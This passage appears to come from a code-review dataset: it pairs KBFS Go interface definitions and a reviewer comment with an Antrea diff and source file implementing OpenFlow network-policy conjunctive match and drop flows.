updateOps(unmergedMostRecent BlockPointer, mergedMostRecent BlockPointer, unmergedBlock *DirBlock, mergedBlock *DirBlock, unmergedChains *crChains, mergedChains *crChains) error // String returns a string representation for this crAction, used // for debugging. String() string } // RekeyQueue is a managed queue of folders needing some rekey action taken // upon them by the current client. type RekeyQueue interface { // Enqueue enqueues a folder for rekey action. If the TLF is already in the // rekey queue, the error channel of the existing one is returned. Enqueue(tlf.ID) // IsRekeyPending returns true if the given folder is in the rekey queue. // Note that an ongoing rekey doesn't count as "pending". IsRekeyPending(tlf.ID) bool // Shutdown cancels all pending rekey actions and clears the queue. It // doesn't cancel ongoing rekeys. After Shutdown() is called, the same // RekeyQueue shouldn't be used anymore. Shutdown() } // BareRootMetadata is a read-only interface to the bare serializeable MD that // is signed by the reader or writer. type BareRootMetadata interface { // TlfID returns the ID of the TLF this BareRootMetadata is for. TlfID() tlf.ID // KeyGenerationsToUpdate returns a range that has to be // updated when rekeying. start is included, but end is not // included. This range can be empty (i.e., start >= end), in // which case there's nothing to update, i.e. the TLF is // public, or there aren't any existing key generations. KeyGenerationsToUpdate() (start KeyGen, end KeyGen) // LatestKeyGeneration returns the most recent key generation in this // BareRootMetadata, or PublicKeyGen if this TLF is public. LatestKeyGeneration() KeyGen // IsValidRekeyRequest returns true if the current block is a simple rekey wrt // the passed block. IsValidRekeyRequest(codec kbfscodec.Codec, prevMd BareRootMetadata, user keybase1.UID, prevExtra, extra ExtraMetadata) (bool, error) // MergedStatus returns the status of this update -- has it been // merged into the main folder or not? MergedStatus() MergeStatus // IsRekeySet returns true if the rekey bit is set. IsRekeySet() bool // IsWriterMetadataCopiedSet returns true if the bit is set indicating // the writer metadata was copied. IsWriterMetadataCopiedSet() bool // IsFinal returns true if this is the last metadata block for a given // folder. This is only expected to be set for folder resets. IsFinal() bool // IsWriter returns whether or not the user+device is an authorized writer. IsWriter(ctx context.Context, user keybase1.UID, deviceKey kbfscrypto.CryptPublicKey, teamMemChecker TeamMembershipChecker, extra ExtraMetadata) (bool, error) // IsReader returns whether or not the user+device is an authorized reader. IsReader(ctx context.Context, user keybase1.UID, deviceKey kbfscrypto.CryptPublicKey, teamMemChecker TeamMembershipChecker, extra ExtraMetadata) (bool, error) // DeepCopy returns a deep copy of the underlying data structure. DeepCopy(codec kbfscodec.Codec) (MutableBareRootMetadata, error) // MakeSuccessorCopy returns a newly constructed successor // copy to this metadata revision. It differs from DeepCopy // in that it can perform an up conversion to a new metadata // version. tlfCryptKeyGetter should be a function that // returns a list of TLFCryptKeys for all key generations in // ascending order. 
MakeSuccessorCopy(codec kbfscodec.Codec, crypto cryptoPure, extra ExtraMetadata, latestMDVer MetadataVer, tlfCryptKeyGetter func() ([]kbfscrypto.TLFCryptKey, error), isReadableAndWriter bool) (mdCopy MutableBareRootMetadata, extraCopy ExtraMetadata, err error) // CheckValidSuccessor makes sure the given BareRootMetadata is a valid // successor to the current one, and returns an error otherwise. CheckValidSuccessor(currID kbfsmd.ID, nextMd BareRootMetadata) error // CheckValidSuccessorForServer is like CheckValidSuccessor but with // server-specific error messages. CheckValidSuccessorForServer(currID kbfsmd.ID, nextMd BareRootMetadata) error // MakeBareTlfHandle makes a tlf.Handle for this // BareRootMetadata. Should be used only by servers and MDOps. MakeBareTlfHandle(extra ExtraMetadata) (tlf.Handle, error) // TlfHandleExtensions returns a list of handle extensions associated with the TLf. TlfHandleExtensions() (extensions []tlf.HandleExtension) // GetDevicePublicKeys returns the kbfscrypto.CryptPublicKeys // for all known users and devices. Returns an error if the // TLF is public. GetUserDevicePublicKeys(extra ExtraMetadata) ( writers, readers UserDevicePublicKeys, err error) // GetTLFCryptKeyParams returns all the necessary info to construct // the TLF crypt key for the given key generation, user, and device // (identified by its crypt public key), or false if not found. This // returns an error if the TLF is public. GetTLFCryptKeyParams(keyGen KeyGen, user keybase1.UID, key kbfscrypto.CryptPublicKey, extra ExtraMetadata) ( kbfscrypto.TLFEphemeralPublicKey, EncryptedTLFCryptKeyClientHalf, TLFCryptKeyServerHalfID, bool, error) // IsValidAndSigned verifies the BareRootMetadata, checks the // writer signature, and returns an error if a problem was // found. This should be the first thing checked on a BRMD // retrieved from an untrusted source, and then the signing // user and key should be validated, either by comparing to // the current device key (using IsLastModifiedBy), or by // checking with KBPKI. IsValidAndSigned(ctx context.Context, codec kbfscodec.Codec, crypto cryptoPure, teamMemChecker TeamMembershipChecker, extra ExtraMetadata) error // IsLastModifiedBy verifies that the BareRootMetadata is // written by the given user and device (identified by the // device verifying key), and returns an error if not. IsLastModifiedBy(uid keybase1.UID, key kbfscrypto.VerifyingKey) error // LastModifyingWriter return the UID of the last user to modify the writer metadata. LastModifyingWriter() keybase1.UID // LastModifyingUser return the UID of the last user to modify the any of the metadata. GetLastModifyingUser() keybase1.UID // RefBytes returns the number of newly referenced bytes of data blocks introduced by this revision of metadata. RefBytes() uint64 // UnrefBytes returns the number of newly unreferenced bytes introduced by this revision of metadata. UnrefBytes() uint64 // MDRefBytes returns the number of newly referenced bytes of MD blocks introduced by this revision of metadata. MDRefBytes() uint64 // DiskUsage returns the estimated disk usage for the folder as of this revision of metadata. DiskUsage() uint64 // MDDiskUsage returns the estimated MD disk usage for the folder as of this revision of metadata. MDDiskUsage() uint64 // RevisionNumber returns the revision number associated with this metadata structure. RevisionNumber() kbfsmd.Revision // MerkleSeqNo returns the sequence number of the global // Keybase Merkle tree at the time the MD was written. 
MerkleSeqNo() MerkleSeqNo // BID returns the per-device branch ID associated with this metadata revision. BID() BranchID // GetPrevRoot returns the hash of the previous metadata revision. GetPrevRoot() kbfsmd.ID // IsUnmergedSet returns true if the unmerged bit is set. IsUnmergedSet() bool // GetSerializedPrivateMetadata returns the serialized private metadata as a byte slice. GetSerializedPrivateMetadata() []byte // GetSerializedWriterMetadata serializes the underlying writer metadata and returns the result. GetSerializedWriterMetadata(codec kbfscodec.Codec) ([]byte, error) // Version returns the metadata version. Version() MetadataVer // GetCurrentTLFPublicKey returns the TLF public key for the // current key generation. GetCurrentTLFPublicKey(ExtraMetadata) (kbfscrypto.TLFPublicKey, error) // GetUnresolvedParticipants returns any unresolved readers // and writers present in this revision of metadata. The // returned array should be safe to modify by the caller. GetUnresolvedParticipants() []keybase1.SocialAssertion // GetTLFWriterKeyBundleID returns the ID of the externally-stored writer key bundle, or the zero value if // this object stores it internally. GetTLFWriterKeyBundleID() TLFWriterKeyBundleID // GetTLFReaderKeyBundleID returns the ID of the externally-stored reader key bundle, or the zero value if // this object stores it internally. GetTLFReaderKeyBundleID() TLFReaderKeyBundleID // StoresHistoricTLFCryptKeys returns whether or not history keys are symmetrically encrypted; if not, they're // encrypted per-device. StoresHistoricTLFCryptKeys() bool // GetHistoricTLFCryptKey attempts to symmetrically decrypt the key at the given // generation using the current generation's TLFCryptKey. GetHistoricTLFCryptKey(c cryptoPure, keyGen KeyGen, currentKey kbfscrypto.TLFCryptKey, extra ExtraMetadata) ( kbfscrypto.TLFCryptKey, error) } // MutableBareRootMetadata is a mutable interface to the bare serializeable MD that is signed by the reader or writer. type MutableBareRootMetadata interface { BareRootMetadata // SetRefBytes sets the number of newly referenced bytes of data blocks introduced by this revision of metadata. SetRefBytes(refBytes uint64) // SetUnrefBytes sets the number of newly unreferenced bytes introduced by this revision of metadata. SetUnrefBytes(unrefBytes uint64) // SetMDRefBytes sets the number of newly referenced bytes of MD blocks introduced by this revision of metadata. SetMDRefBytes(mdRefBytes uint64) // SetDiskUsage sets the estimated disk usage for the folder as of this revision of metadata. SetDiskUsage(diskUsage uint64) // SetMDDiskUsage sets the estimated MD disk usage for the folder as of this revision of metadata. SetMDDiskUsage(mdDiskUsage uint64) // AddRefBytes increments the number of newly referenced bytes of data blocks introduced by this revision of metadata. AddRefBytes(refBytes uint64) // AddUnrefBytes increments the number of newly unreferenced bytes introduced by this revision of metadata. AddUnrefBytes(unrefBytes uint64) // AddMDRefBytes increments the number of newly referenced bytes of MD blocks introduced by this revision of metadata. AddMDRefBytes(mdRefBytes uint64) // AddDiskUsage increments the estimated disk usage for the folder as of this revision of metadata. AddDiskUsage(diskUsage uint64) // AddMDDiskUsage increments the estimated MD disk usage for the folder as of this revision of metadata. AddMDDiskUsage(mdDiskUsage uint64) // ClearRekeyBit unsets any set rekey bit. 
ClearRekeyBit() // ClearWriterMetadataCopiedBit unsets any set writer metadata copied bit. ClearWriterMetadataCopiedBit() // ClearFinalBit unsets any final bit. ClearFinalBit() // SetUnmerged sets the unmerged bit. SetUnmerged() // SetBranchID sets the branch ID for this metadata revision. SetBranchID(bid BranchID) // SetPrevRoot sets the hash of the previous metadata revision. SetPrevRoot(mdID kbfsmd.ID) // SetSerializedPrivateMetadata sets the serialized private metadata. SetSerializedPrivateMetadata(spmd []byte) // SignWriterMetadataInternally signs the writer metadata, for // versions that store this signature inside the metadata. SignWriterMetadataInternally(ctx context.Context, codec kbfscodec.Codec, signer kbfscrypto.Signer) error // SetLastModifyingWriter sets the UID of the last user to modify the writer metadata. SetLastModifyingWriter(user keybase1.UID) // SetLastModifyingUser sets the UID of the last user to modify any of the metadata. SetLastModifyingUser(user keybase1.UID) // SetRekeyBit sets the rekey bit. SetRekeyBit() // SetFinalBit sets the finalized bit. SetFinalBit() // SetWriterMetadataCopiedBit set the writer metadata copied bit. SetWriterMetadataCopiedBit() // SetRevision sets the revision number of the underlying metadata. SetRevision(revision kbfsmd.Revision) // SetMerkleSeqNo sets the sequence number of the global // Keybase Merkle tree at the time the MD was written. SetMerkleSeqNo(seqNo MerkleSeqNo) // SetUnresolvedReaders sets the list of unresolved readers associated with this folder. SetUnresolvedReaders(readers []keybase1.SocialAssertion) // SetUnresolvedWriters sets the list of unresolved writers associated with this folder. SetUnresolvedWriters(writers []keybase1.SocialAssertion) // SetConflictInfo sets any conflict info associated with this metadata revision. SetConflictInfo(ci *tlf.HandleExtension) // SetFinalizedInfo sets any finalized info associated with this metadata revision. SetFinalizedInfo(fi *tlf.HandleExtension) // SetWriters sets the list of writers associated with this folder. SetWriters(writers []keybase1.UserOrTeamID) // SetTlfID sets the ID of the underlying folder in the metadata structure. SetTlfID(tlf tlf.ID) // AddKeyGeneration adds a new key generation to this revision // of metadata. If StoresHistoricTLFCryptKeys is false, then // currCryptKey must be zero. Otherwise, currCryptKey must be // zero if there are no existing key generations, and non-zero // for otherwise. // // AddKeyGeneration must only be called on metadata for // private TLFs. // // Note that the TLFPrivateKey corresponding to privKey must // also be stored in PrivateMetadata. AddKeyGeneration(codec kbfscodec.Codec, crypto cryptoPure, currExtra ExtraMetadata, updatedWriterKeys, updatedReaderKeys UserDevicePublicKeys, ePubKey kbfscrypto.TLFEphemeralPublicKey, ePrivKey kbfscrypto.TLFEphemeralPrivateKey, pubKey kbfscrypto.TLFPublicKey, currCryptKey, nextCryptKey kbfscrypto.TLFCryptKey) ( nextExtra ExtraMetadata, serverHalves UserDeviceKeyServerHalves, err error) // SetLatestKeyGenerationForTeamTLF sets the latest key generation // number of a team TLF. It is not valid to call this for // anything but a team TLF. SetLatestKeyGenerationForTeamTLF(keyGen KeyGen) // UpdateKeyBundles ensures that every device for every writer // and reader in the provided lists has complete TLF crypt key // info, and uses the new ephemeral key pair to generate the // info if it doesn't yet exist. 
tlfCryptKeys must contain an // entry for each key generation in KeyGenerationsToUpdate(), // in ascending order. // // updatedWriterKeys and updatedReaderKeys usually contains // the full maps of writers to per-device crypt public keys, // but for reader rekey, updatedWriterKeys will be empty and // updatedReaderKeys will contain only a single entry. // // UpdateKeyBundles must only be called on metadata for // private TLFs. // // An array of server halves to push to the server are // returned, with each entry corresponding to each key // generation in KeyGenerationsToUpdate(), in ascending order. UpdateKeyBundles(crypto cryptoPure, extra ExtraMetadata, updatedWriterKeys, updatedReaderKeys UserDevicePublicKeys, ePubKey kbfscrypto.TLFEphemeralPublicKey, ePrivKey kbfscrypto.TLFEphemeralPrivateKey, tlfCryptKeys []kbfscrypto.TLFCryptKey) ( []UserDeviceKeyServerHalves, error) // PromoteReaders converts the given set of users (which may // be empty) from readers to writers. PromoteReaders(readersToPromote map[keybase1.UID]bool, extra ExtraMetadata) error // RevokeRemovedDevices removes key info for any device not in // the given maps, and returns a corresponding map of server // halves to delete from the server. // // Note: the returned server halves may not be for all key // generations, e.g. for MDv3 it's only for the latest key // generation. RevokeRemovedDevices( updatedWriterKeys, updatedReaderKeys UserDevicePublicKeys, extra ExtraMetadata) (ServerHalfRemovalInfo, error) // FinalizeRekey must be called called after all rekeying work // has been performed on the underlying metadata. FinalizeRekey(c cryptoPure, extra ExtraMetadata) error } // KeyBundleCache is an interface to a key bundle cache for use with v3 metadata. type KeyBundleCache interface { // GetTLFReaderKeyBundle returns the TLFReaderKeyBundleV3 for // the given TLFReaderKeyBundleID, or nil if there is none. GetTLFReaderKeyBundle(tlf.ID, TLFReaderKeyBundleID) (*TLFReaderKeyBundleV3, error) // GetTLFWriterKeyBundle returns the TLFWriterKeyBundleV3 for // the given TLFWriterKeyBundleID, or nil if there is none. GetTLFWriterKeyBundle(tlf.ID, TLFWriterKeyBundleID) (*TLFWriterKeyBundleV3, error) // PutTLFReaderKeyBundle stores the given TLFReaderKeyBundleV3. PutTLFReaderKeyBundle(tlf.ID, TLFReaderKeyBundleID, TLFReaderKeyBundleV3) // PutTLFWriterKeyBundle stores the given TLFWriterKeyBundleV3. PutTLFWriterKeyBundle(tlf.ID, TLFWriterKeyBundleID, TLFWriterKeyBundleV3) } // RekeyFSM is a Finite State Machine (FSM) for housekeeping rekey states for a // FolderBranch. Each FolderBranch has its own FSM for rekeys. // // See rekey_fsm.go for implementation details. // // TODO: report FSM status in FolderBranchStatus? type RekeyFSM interface { // Event sends an event to the FSM. Event(event RekeyEvent) // Shutdown shuts down the FSM. No new event should be sent into the FSM // after this method is called. Shutdown() // listenOnEvent adds a listener (callback) to the FSM so that when // event happens, callback is called with the received event. If repeatedly // is set to false, callback is called only once. Otherwise it's called every // time event happens. // // Currently this is only used in tests and for RekeyFile. See comment for // RequestRekeyAndWaitForOneFinishEvent for more details. listenOnEvent( event rekeyEventType, callback func(RekeyEvent), repeatedly bool) } // BlockRetriever specifies how to retrieve blocks. type BlockRetriever interface { // Request retrieves blocks asynchronously. 
Request(ctx context.Context, priority int, kmd KeyMetadata, ptr BlockPointer, block Block, lifetime BlockCacheLifetime) <-chan error // CacheAndPrefetch caches a block along with its prefetch status, and then // triggers prefetches as appropriate. CacheAndPrefetch(ctx context.Context, ptr BlockPointer, block Block, kmd KeyMetadata, priority int, lifetime BlockCacheLifetime, hasPrefetched bool) error }
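Of the interfaces listed above, Clock is the simplest; the following is a minimal, hypothetical sketch of an implementation backed by the system clock. The type name wallClock and the demo main function are assumptions for illustration only and do not appear in the KBFS source; the real Clock type lives in the KBFS package, so the demo binds through an equivalent anonymous interface.

package main

import (
	"fmt"
	"time"
)

// wallClock is a hypothetical implementation of the Clock interface
// described above; it simply delegates to the system clock.
type wallClock struct{}

// Now returns the current time, satisfying Clock's single method.
func (wallClock) Now() time.Time { return time.Now() }

func main() {
	// Bind through an anonymous interface with the same method set,
	// since the actual Clock type is not imported here.
	var c interface{ Now() time.Time } = wallClock{}
	fmt.Println("current time:", c.Now())
}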
idx: 1
id: 17,205
msg: I believe you meant "specify `desiredUID` and `desiredRole`"?
proj: keybase-kbfs
lang: go
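The record just shown can also be handled programmatically. Below is a minimal, hypothetical Go sketch of one row, assuming the per-row fields seen in this dump (patch, y, oldf, idx, id, msg, proj, lang) and a JSON encoding; the struct name reviewRecord, the JSON field names, and the sample payload are illustrative assumptions, not part of the dataset definition.

package main

import (
	"encoding/json"
	"fmt"
)

// reviewRecord is a hypothetical representation of one row of this dump.
type reviewRecord struct {
	Patch string `json:"patch"` // unified diff under review
	Y     int    `json:"y"`
	OldF  string `json:"oldf"` // file contents before the patch
	Idx   int    `json:"idx"`
	ID    int    `json:"id"`
	Msg   string `json:"msg"` // reviewer comment
	Proj  string `json:"proj"`
	Lang  string `json:"lang"`
}

func main() {
	// Sample payload with assumed field names; values are placeholders.
	raw := `{"id": 17205, "proj": "keybase-kbfs", "lang": "go", "y": 1, "idx": 1, "msg": "example comment"}`
	var r reviewRecord
	if err := json.Unmarshal([]byte(raw), &r); err != nil {
		panic(err)
	}
	fmt.Printf("%s (%s): %s\n", r.Proj, r.Lang, r.Msg)
}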
patch:
@@ -16,10 +16,9 @@ package openflow
 
 import (
 	"fmt"
+	"github.com/vmware-tanzu/antrea/pkg/apis/networking/v1beta1"
 	"net"
 
-	coreV1 "k8s.io/api/core/v1"
-	v1 "k8s.io/api/networking/v1"
 	"k8s.io/klog"
 
 	"github.com/vmware-tanzu/antrea/pkg/agent/types"
y: 1
// Copyright 2019 Antrea Authors // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package openflow import ( "fmt" "net" coreV1 "k8s.io/api/core/v1" v1 "k8s.io/api/networking/v1" "k8s.io/klog" "github.com/vmware-tanzu/antrea/pkg/agent/types" binding "github.com/vmware-tanzu/antrea/pkg/ovs/openflow" ) const ( MatchDstIP int = iota MatchSrcIP MatchDstIPNet MatchSrcIPNet MatchDstOFPort MatchSrcOFPort MatchTCPDstPort MatchUDPDstPort MatchSCTPDstPort Unsupported ) // IP address calculated from Pod's address. type IPAddress net.IP func (a *IPAddress) GetMatchKey(addrType types.AddressType) int { switch addrType { case types.SrcAddress: return MatchSrcIP case types.DstAddress: return MatchDstIP default: klog.Errorf("Unknown AddressType %d in IPAddress", addrType) return Unsupported } } func (a *IPAddress) GetMatchValue() string { addr := net.IP(*a) return addr.String() } func (a *IPAddress) GetValue() interface{} { return net.IP(*a) } func NewIPAddress(addr net.IP) *IPAddress { ia := IPAddress(addr) return &ia } // IP block calculated from Pod's address. type IPNetAddress net.IPNet func (a *IPNetAddress) GetMatchKey(addrType types.AddressType) int { switch addrType { case types.SrcAddress: return MatchSrcIPNet case types.DstAddress: return MatchDstIPNet default: klog.Errorf("Unknown AddressType %d in IPNetAddress", addrType) return Unsupported } } func (a *IPNetAddress) GetMatchValue() string { addr := net.IPNet(*a) return addr.String() } func (a *IPNetAddress) GetValue() interface{} { return net.IPNet(*a) } func NewIPNetAddress(addr net.IPNet) *IPNetAddress { ia := IPNetAddress(addr) return &ia } // OFPortAddress is the Openflow port of an interface. type OFPortAddress int32 func (a *OFPortAddress) GetMatchKey(addrType types.AddressType) int { switch addrType { case types.SrcAddress: // in_port is used in egress rule to match packets sent from local Pod. Service traffic is not covered by this // match, and source IP will be matched instead. return MatchSrcOFPort case types.DstAddress: return MatchDstOFPort default: klog.Errorf("Unknown AddressType %d in OFPortAddress", addrType) return Unsupported } } func (a *OFPortAddress) GetMatchValue() string { return fmt.Sprintf("%d", int32(*a)) } func (a *OFPortAddress) GetValue() interface{} { return int32(*a) } func NewOFPortAddress(addr int32) *OFPortAddress { a := OFPortAddress(addr) return &a } // ConjunctionNotFound is an error response when the specified policyRuleConjunction is not found from the local cache. type ConjunctionNotFound uint32 func (e *ConjunctionNotFound) Error() string { return fmt.Sprintf("policyRuleConjunction with ID %d not found", uint32(*e)) } func newConjunctionNotFound(conjunctionID uint32) *ConjunctionNotFound { err := ConjunctionNotFound(conjunctionID) return &err } // conjunctiveMatch generates match conditions for conjunctive match flow entry, including source or destination // IP address, ofport number of OVS interface, or Service port. 
When conjunctiveMatch is used to match IP // address or ofport number, matchProtocol is "ip". When conjunctiveMatch is used to match Service // port, matchProtocol is Service protocol. If Service protocol is not set, "tcp" is used by default. type conjunctiveMatch struct { tableID binding.TableIDType matchKey int matchValue interface{} } func (m *conjunctiveMatch) generateGlobalMapKey() string { var valueStr string matchType := m.matchKey switch v := m.matchValue.(type) { case net.IP: // Use the unique format "x.x.x.x/xx" for IP address and IP net, to avoid generating two different global map // keys for IP and IP/32. Use MatchDstIPNet/MatchSrcIPNet as match type to generate global cache key for both IP // and IPNet. This is because OVS treats IP and IP/32 as the same condition, if Antrea has two different // conjunctive match flow contexts, only one flow entry is installed on OVS, and the conjunctive actions in the // first context wil be overwritten by those in the second one. valueStr = fmt.Sprintf("%s/32", v.String()) switch m.matchKey { case MatchDstIP: matchType = MatchDstIPNet case MatchSrcIP: matchType = MatchSrcIPNet } case net.IPNet: valueStr = v.String() default: // The default cases include the matchValue is a Service port or an ofport Number. valueStr = fmt.Sprintf("%s", m.matchValue) } return fmt.Sprintf("table:%d,type:%d,value:%s", m.tableID, matchType, valueStr) } // changeType is generally used to describe the change type of a conjMatchFlowContext. It is also used in "flowChange" // to describe the expected OpenFlow operation which needs to be applied on the OVS bridge, and used in "actionChange" // to describe the policyRuleConjunction is expected to be added to or removed from conjMatchFlowContext's actions. // The value of changeType could be creation, modification, and deletion. type changeType int const ( insertion changeType = iota modification deletion ) // flowChange stores the expected OpenFlow entry and flow operation type which need to be applied on the OVS bridge. // The "flow" in flowChange should be nil if there is no change on the OpenFlow entry. A possible case is that a // DENY-ALL rule is required by a policyRuleConjunction, the flowChange will update the in-memory cache, but will not // change on OVS. type flowChange struct { flow binding.Flow changeType changeType } // actionChange stores the changed action of the conjunctive match flow, and the change type. // The "action" in actionChange is not nil. type actionChange struct { action *conjunctiveAction changeType changeType } // conjunctiveAction generates the policyRuleConjunction action in Openflow entry. The flow action is like // policyRuleConjunction(conjID,clauseID/nClause) when it has been realized on the switch. type conjunctiveAction struct { conjID uint32 clauseID uint8 nClause uint8 } // conjMatchFlowContext generates conjunctive match flow entries for conjunctions share the same match conditions. // One conjMatchFlowContext is responsible for one specific conjunctive match flow entry. As the match condition // of the flow entry can be shared by different conjunctions, the realized Openflow entry might have multiple // conjunctive actions. If the dropTable is not nil, conjMatchFlowContext also installs a drop flow in the dropTable. type conjMatchFlowContext struct { // conjunctiveMatch describes the match condition of conjunctive match flow entry. *conjunctiveMatch // actions is a map from policyRuleConjunction ID to conjunctiveAction. 
It records all the conjunctive actions in // the conjunctive match flow. When the number of actions is reduced to 0, the conjMatchFlowContext.flow is // uninstalled from the switch. actions map[uint32]*conjunctiveAction // denyAllRules is a set to cache the "DENY-ALL" rules that is applied to the matching address in this context. denyAllRules map[uint32]bool client *client // flow is the conjunctive match flow built from this context. flow needs to be updated if actions are changed. flow binding.Flow // dropflow is the default drop flow built from this context to drop packets in the AppliedToGroup but not pass the // NetworkPolicy rule. dropFlow is installed on the switch as long as either actions or denyAllRules is not // empty, and uninstalled when both two are empty. When the dropFlow is uninstalled from the switch, the // conjMatchFlowContext is removed from the cache. dropFlow binding.Flow } // createOrUpdateConjunctiveMatchFlow creates or updates the conjunctive match flow with the latest actions. It returns // the flowChange including the changed OpenFlow entry and the expected operation which need to be applied on the OVS bridge. func (ctx *conjMatchFlowContext) createOrUpdateConjunctiveMatchFlow(actions []*conjunctiveAction) *flowChange { // Check if flow is already installed. If not, create a new flow. if ctx.flow == nil { // Check the number of valid conjunctiveActions, and return nil immediately if it is 0. It happens when the match // condition is used only for matching AppliedToGroup, but no From or To is defined in the NetworkPolicy rule. if len(actions) == 0 { return nil } // Create the conjunctive match flow entry. The actions here should not be empty for either add or update case. // The expected operation for a new Openflow entry should be "insertion". flow := ctx.client.conjunctiveMatchFlow(ctx.tableID, ctx.matchKey, ctx.matchValue, actions...) return &flowChange{ flow: flow, changeType: insertion, } } // Modify the existing Openflow entry and reset the actions. flowBuilder := ctx.flow.CopyToBuilder() for _, act := range actions { flowBuilder.Action().Conjunction(act.conjID, act.clauseID, act.nClause) } // The expected operation for an existing Openflow entry should be "modification". return &flowChange{ flow: flowBuilder.Done(), changeType: modification, } } // deleteAction deletes the specified policyRuleConjunction from conjunctiveMatchFlow's actions, and then returns the // flowChange. func (ctx *conjMatchFlowContext) deleteAction(conjID uint32) *flowChange { // If the specified conjunctive action is the last one, delete the conjunctive match flow entry from the OVS bridge. // No need to check if the conjunction ID of the only conjunctive action is the specified ID or not, as it // has been checked in the caller. if len(ctx.actions) == 1 && ctx.flow != nil { return &flowChange{ flow: ctx.flow, changeType: deletion, } } else { // Modify the Openflow entry and reset the other conjunctive actions. var actions []*conjunctiveAction for _, act := range ctx.actions { if act.conjID != conjID { actions = append(actions, act) } } return ctx.createOrUpdateConjunctiveMatchFlow(actions) } } // addAction adds the specified policyRuleConjunction into conjunctiveMatchFlow's actions, and then returns the flowChange. func (ctx *conjMatchFlowContext) addAction(action *conjunctiveAction) *flowChange { // Check if the conjunction exists in conjMatchFlowContext actions or not. If yes, return nil immediately. 
_, found := ctx.actions[action.conjID] if found { return nil } // Append current conjunctive action to the existing actions, and then calculate the conjunctive match flow changes. actions := []*conjunctiveAction{action} for _, act := range ctx.actions { actions = append(actions, act) } return ctx.createOrUpdateConjunctiveMatchFlow(actions) } func (ctx *conjMatchFlowContext) addDenyAllRule(ruleID uint32) { if ctx.denyAllRules == nil { ctx.denyAllRules = make(map[uint32]bool) } ctx.denyAllRules[ruleID] = true } func (ctx *conjMatchFlowContext) delDenyAllRule(ruleID uint32) { // Delete the DENY-ALL rule if it is in context denyAllRules. _, found := ctx.denyAllRules[ruleID] if found { delete(ctx.denyAllRules, ruleID) } } // conjMatchFlowContextChange describes the changes of a conjMatchFlowContext. It is generated when a policyRuleConjunction // is added, deleted, or the addresses in an existing policyRuleConjunction are changed. The changes are calculated first, // and then applied on the OVS bridge using a single Bundle, and lastly the local cache is updated. The local cahce // is updated only if conjMatchFlowContextChange is applied on the OVS bridge successfully. type conjMatchFlowContextChange struct { // context is the changed conjMatchFlowContext, which needs to be updated after the OpenFlow entries are applied to // the OVS bridge. context is not nil. context *conjMatchFlowContext // ctxChangeType is the changed type of the conjMatchFlowContext. The possible values are "creation", "modification" // and "deletion". Add the context into the globalConjMatchFlowCache if the ctxChangeType is "insertion", and remove // from the globalConjMatchFlowCache if it is "deletion". ctxChangeType changeType // matchFlow is the changed conjunctive match flow which needs to be realized on the OVS bridge. It is used to update // conjMatchFlowContext.flow. matchFlow is set if the conjunctive match flow needs to be updated on the OVS bridge, or // a DENY-ALL rule change is required by the policyRuleConjunction. matchFlow is nil if the policyRuleConjunction // is already added/removed in the conjMatchFlowContext's actions or denyAllRules. matchFlow *flowChange // dropFlow is the changed drop flow which needs to be realized on the OVS bridge. It is used to update // conjMatchFlowContext.dropFlow. dropFlow is set when the default drop flow needs to be added or removed on the OVS // bridge, and it is nil in other cases. dropFlow *flowChange // clause is the policyRuleConjunction's clause having current conjMatchFlowContextChange. It is used to update the // mapping relations between the policyRuleConjunction and the conjMatchFlowContext. Update the clause.matches after // the conjMatchFlowContextChange is realized on the OVS bridge. clause is not nil. clause *clause // actChange is the changed conjunctive action. It is used to update the conjMatchFlowContext's actions. actChange // is not nil. actChange *actionChange } // updateContextStatus changes conjMatchFlowContext's status, including, // 1) reset flow and dropFlow after the flow changes have been applied to the OVS bridge, // 2) modify the actions with the changed action, // 3) update the mapping of denyAllRules and corresponding policyRuleConjunction, // 4) add the new conjMatchFlowContext into the globalConjMatchFlowCache, or remove the deleted conjMatchFlowContext // from the globalConjMatchFlowCache. 
func (c *conjMatchFlowContextChange) updateContextStatus() { matcherKey := c.context.generateGlobalMapKey() // Update clause.matches with the conjMatchFlowContext, and update conjMatchFlowContext.actions with the changed // conjunctive action. changedAction := c.actChange.action switch c.actChange.changeType { case insertion: c.clause.matches[matcherKey] = c.context if changedAction != nil { c.context.actions[changedAction.conjID] = changedAction } case deletion: delete(c.clause.matches, matcherKey) if changedAction != nil { delete(c.context.actions, changedAction.conjID) } } // Update the match flow in the conjMatchFlowContext. There are two kinds of possible changes on the match flow: // 1) A conjunctive match flow change required by the policyRuleConjunction. // 2) A DENY-ALL rule required by the policyRuleConjunction. // For 1), conjMatchFlowContext.Flow should be updated with the conjMatchFlowContextChange.matchFlow.flow. // For 2), append or delete the conjunction ID from the conjMatchFlowContext's denyAllRules. if c.matchFlow != nil { switch c.matchFlow.changeType { case insertion: fallthrough case modification: if c.matchFlow.flow != nil { c.context.flow = c.matchFlow.flow } else { switch c.actChange.changeType { case insertion: c.context.addDenyAllRule(c.clause.action.conjID) case deletion: c.context.delDenyAllRule(c.clause.action.conjID) } } case deletion: if c.matchFlow.flow != nil { c.context.flow = nil } else { c.context.delDenyAllRule(c.clause.action.conjID) } } } // Update conjMatchFlowContext.dropFlow. if c.dropFlow != nil { switch c.dropFlow.changeType { case insertion: c.context.dropFlow = c.dropFlow.flow case deletion: c.context.dropFlow = nil } } // Update globalConjMatchFlowCache. Add the conjMatchFlowContext into the globalConjMatchFlowCache if the ctxChangeType // is "insertion", or delete from the globalConjMatchFlowCache if the ctxChangeType is "deletion". switch c.ctxChangeType { case insertion: c.context.client.globalConjMatchFlowCache[matcherKey] = c.context case deletion: delete(c.context.client.globalConjMatchFlowCache, matcherKey) } } // policyRuleConjunction is responsible to build Openflow entries for Pods that are in a NetworkPolicy rule's AppliedToGroup. // The Openflow entries include conjunction action flows, conjunctive match flows, and default drop flows in the dropTable. // NetworkPolicyController will make sure only one goroutine operates on a policyRuleConjunction. // 1) Conjunction action flows use policyRuleConjunction ID as match condition. policyRuleConjunction ID is the single // match condition for conjunction action flows to allow packets. If the NetworkPolicy rule has also configured excepts // in From or To, extra Openflow entries are installed to drop packets using the addresses in the excepts and // policyRuleConjunction ID as the match conditions, and these flows have a higher priority than the one only matching // policyRuleConjunction ID. // 2) Conjunctive match flows adds conjunctive actions in Openflow entry, and they are grouped by clauses. The match // condition in one clause is one of these three types: from address(for fromClause), or to address(for toClause), or // service ports(for serviceClause) configured in the 